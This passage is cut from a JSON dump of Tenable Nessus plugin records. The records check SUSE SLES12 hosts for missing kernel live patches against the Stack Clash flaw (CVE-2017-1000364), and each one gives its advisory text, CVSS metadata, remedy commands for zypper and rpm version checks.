https://www.suse.com/support/update/announcement/2017/suse-su-20171909-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa9b99dd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1190=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1190=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_18-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_18-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_67-60_64_18-default-8-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_67-60_64_18-xen-8-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:34", "description": "This update for the Linux Kernel 3.12.62-60_64_8 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1910-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_62-60_64_8-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_62-60_64_8-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1910-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1910-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101888);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1910-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.62-60_64_8 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171910-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28dbb4c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1189=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1189=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_62-60_64_8-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_62-60_64_8-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_62-60_64_8-default-9-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_62-60_64_8-xen-9-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:35", "description": "This update for the Linux Kernel 3.12.61-52_69 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1945-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1945-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1945-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101947);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1945-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_69 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171945-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?91df34d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1205=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1205=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_69-default-3-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_69-xen-3-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:34", "description": "This update for the Linux Kernel 3.12.67-60_64_24 fixes several issues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1942-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_24-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_24-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1942-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101944", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1942-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101944);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1942-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.67-60_64_24 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171942-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?263147ac\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1211=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1211=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_24-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_24-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_67-60_64_24-default-6-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_67-60_64_24-xen-6-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:33", "description": "This update for the Linux Kernel 3.12.60-52_57 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1905-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": 